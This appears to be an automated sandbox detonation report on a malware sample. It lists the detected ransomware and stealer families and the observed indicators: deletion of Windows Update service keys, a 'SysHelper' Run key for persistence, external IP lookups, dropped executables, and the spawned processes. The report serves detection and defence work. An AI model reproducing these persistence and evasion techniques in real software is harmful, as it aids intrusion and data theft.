Analysis Overview
SHA256
a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae
Threat Level: Known bad
The file a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Djvu Ransomware
Raccoon
Modifies security service
Lumma Stealer
Amadey
Detected Djvu ransomware
SmokeLoader
Stops running service(s)
Downloads MZ/PE file
Blocklisted process makes network request
Modifies file permissions
VMProtect packed file
Reads user/profile data of web browsers
Loads dropped DLL
Reads user/profile data of local email clients
Executes dropped EXE
Deletes itself
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Looks up external IP address via web service
Adds Run key to start application
Accesses 2FA software files, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Suspicious behavior: LoadsDriver
Checks processor information in registry
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-04-25 12:52
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-04-25 12:52
Reported
2023-04-25 12:54
Platform
win10-20230220-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Amadey
Detected Djvu ransomware
Djvu Ransomware
Lumma Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
Raccoon
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1E46.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1E46.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
VMProtect packed file
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a21aa4a2-2388-4a0c-8d42-caa3b3f83d0e\\42FA.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\42FA.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Notepad\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Notepad\Chrome\updater.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4173.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7420.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\27DE.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4173.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4173.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7420.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\27DE.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\27DE.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7420.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1E46.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1E46.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: LoadsDriver
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\27DE.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4173.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7420.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\79BE.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oldplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe
"C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe"
C:\Users\Admin\AppData\Local\Temp\1E46.exe
C:\Users\Admin\AppData\Local\Temp\1E46.exe
C:\Users\Admin\AppData\Local\Temp\1FAE.exe
C:\Users\Admin\AppData\Local\Temp\1FAE.exe
C:\Users\Admin\AppData\Local\Temp\209A.exe
C:\Users\Admin\AppData\Local\Temp\209A.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\27DE.exe
C:\Users\Admin\AppData\Local\Temp\27DE.exe
C:\Users\Admin\AppData\Local\Temp\3F30.exe
C:\Users\Admin\AppData\Local\Temp\3F30.exe
C:\Users\Admin\AppData\Local\Temp\4173.exe
C:\Users\Admin\AppData\Local\Temp\4173.exe
C:\Users\Admin\AppData\Local\Temp\42FA.exe
C:\Users\Admin\AppData\Local\Temp\42FA.exe
